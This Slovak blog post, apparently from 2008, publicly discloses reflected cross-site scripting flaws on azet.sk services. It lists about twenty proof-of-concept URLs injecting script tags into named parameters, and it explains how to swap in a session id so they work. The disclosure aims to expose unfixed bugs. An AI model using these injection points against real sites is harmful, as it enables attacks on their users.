Security on azet.sk

Azet a xss aneb x xss chyb na pokeci. Uz mi odpisali :) po tyzdni

Azet a xss aneb x xss chyb na pokeci.

Uz mi odpisali :) po tyzdni

Prehlásenie: Článok je napísaný len na vzdelávacie účely, za prípadné zneužitie autor článku ani prevádzkovateľ stránky nezodpovedá. Pisal som im 2x ani raz mi neodpovedali... raz davno o tychto chybach a teraz...

Davnejšie bolo pisane co je to XSS a clanok o XSS v praxi

It's XSS security test on azet[DOT]sk

http://wap.azet.sk/autologin.phtml?n=%3Cscript%3Ealert(1)%3C%2Fscript%3E&h=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D&tm=1217084199

XSS: (pozor na nahrady i9) http://plus.azet.sk/?&i9=10967f1ddd63&prod=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://moje.azet.sk/priatelia.phtml?i9=0e042cb09663&All=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://zoznamka.azet.sk/inzeraty.phtml?&kat=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://plus.azet.sk/plusDar.phtml?i9=10967f1ddd63&to=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://moje.azet.sk/priatelia.phtml?i9=0e042cb09663&On=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://www6.posta.azet.sk/MailNastavenia.phtml?&i9=0e042cb09663&t_vypis=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://www6.posta.azet.sk/sms_notification.phtml?&i9=0e042cb09663&t_vypis=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://www6.posta.azet.sk/Adresar.phtml?&i9=0e042cb09663&t_vypis=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://www6.posta.azet.sk/MailSend.phtml?&i9=0e042cb09663&t_vypis=2&id_tmpatt=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://www6.posta.azet.sk/SpravaAdresarov.phtml?&i9=0e042cb09663&t_vypis=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://www962.posta.azet.sk/moje/posta.phtml?i9=0e042cb09663&Typ=1&with=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://moje.azet.sk/uzivatelia.phtml?i9=0e042cb09663&log_last=1&pohlavie=2&kraj=k_8&vek_od=99&vek_do=100&fotoonly=0&TypVypisu=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&st=2

http://pokeclive.azet.sk/actions.phtml?i9=0e042cb09663&pf=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://www.tahaky-referaty.sk/ostatne/%22%3E%3Cscript%3Ealert(1)%3C/script%3E/&i9=0e042cb09663

http://vtipy.azet.sk/vtipy.phtml?i9=0e042cb09663&ord=2&max=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://vtipy.azet.sk/vtipy.phtml?i9=0e042cb09663&sms=1&idK=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Linky schválne nedávam skrátené kvoli i9, mate ho v clanku zvyraznene... dole mate napisane co i9 je

Ine Xyby

Skrínšhoty z chybami máte tu http://www.imghost.sk/view.php?filename=jcy89103.png http://www.imghost.sk/view.php?filename=fB089103.png http://www.imghost.sk/view.php?filename=79j89103.png http://www.imghost.sk/view.php?filename=IOW89103.png http://www.imghost.sk/view.php?filename=gIJ89103.png http://www.imghost.sk/view.php?filename=HMX89189.png http://www.imghost.sk/view.php?filename=rBm89189.png http://www.imghost.sk/view.php?filename=zKH89189.png http://www.imghost.sk/view.php?filename=F4j89189.png http://www.imghost.sk/view.php?filename=0NK89189.png

Všetko je ešte furt funkčné....

Komunikácia Spoločnosti som napísal, majlu sa asi nedočkám ne ? :) Informoval som ich davnejšie a teraz ani raz odpoved...

VYSVETLIUKY: i9 = ID vygenerrovane v linku, in aur prípade to bolo: 0e042cb09663 ale pri kazdom prihlaseni vam to vygeneruje iné takže to musite zmeniť inak vam to nepojde

http://vybrali.sme.sk/c/XSS-test-AZETSK/

Pozdravuje Vás KaiDŽas

Související články

• Štvrť milióna emailov voľne na zoznamka.sk [azet] voľne k dizpozícií (14. červenece 08, 11:07)
• Riziko vo virtuálnom svete či v on-line hrách je stále vyššie (10. září 08, 14:09)
• Orangeportal.sk (25. červenece 08, 12:07)
• Redirect portálu centrum.sk (19. červenece 08, 19:07)
• XSS test #1: Zoznam.sk (20. červenece 08, 14:07)
• XSS test #2: Centrum.sk (21. červenece 08, 18:07)
• Volanie zadarmo cez zlatestranky.sk (22. prosince 08, 13:12)